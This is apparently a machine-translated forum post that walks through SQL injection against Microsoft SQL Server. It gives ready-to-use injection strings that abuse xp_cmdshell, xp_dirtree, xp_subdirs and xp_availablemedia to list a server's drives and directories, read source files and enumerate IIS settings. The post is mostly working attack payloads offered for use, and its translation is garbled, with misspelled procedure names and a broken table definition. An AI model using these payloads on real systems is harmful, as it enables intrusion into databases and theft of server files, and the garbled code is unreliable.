How to use SQL into the traversal directory
Regarding how to get into the entrance, no more, the previous post is very detailed, we have all permissions, including executing master.dbo.xp_cmdshell, including executing master.dbo.xp_cmdshell, This stored procedure has no name or delete, we can use it to traverse all directories, execute as follows: Temp'5; Create Table Temp (ID NVARCHAR (255), Num1 nVarchar (255) Num3 nvarchar (255)); - Next: (1) We can use XP_availableMedia to get all current drives and store them in the TEMP table; Insert Temp Exec master.dbo.xp_availablemedia; - We can By querying the contents of TEMP and related information (2) We can use XP_SUBDIRS to obtain subdirectory lists and store them in TEMP tables: 5 '; Insert Into Temp (ID) exec master.dbo.xp_subdirs' C: / '; - (3) We can also use XP_Dirtree to get all subdirectory directory tree structure, inch into the TEMP table: 5'; Insert Into Temp (ID, NUM1) exec master.dbo.xp_dirtree 'C: /' ; -
This will be able to browse to all directories (folders) list: If we need to view the content of a file, you can execute xp_cmdsell: 5 '; Insert Into Temp (ID) exec master.dbo.xp_cmdshell' Type C: /web/index.asp'; - Browse Temp can see the content of the index.asp file!
Of course, if XP_cmshell can perform, we can use it to complete: 5 '; Insert Into Temp (ID) exec master.dbo.xp_cmdshell' DIR C: / '; - 5'; Insert Into Temp (ID) Exec Master. DBO.XP_CMDSHELL 'DIR C: / * .ASP / S / A';
We can see all what you want to see, including W3SVC via xp_cmdshell.
5 '; INSERT INTO TEMP (ID) exec master.dbo.xp_cmdshell' cscript c: /inetpub/adminscripts/adsutil.vbs Enum W3SVC '
However, if not admin, we can also use 5 '; Insert Into Temp (ID, Num1) exec master.dbo.xp_dirtree' c: / ';
If you have any good way to welcome to discuss research with me
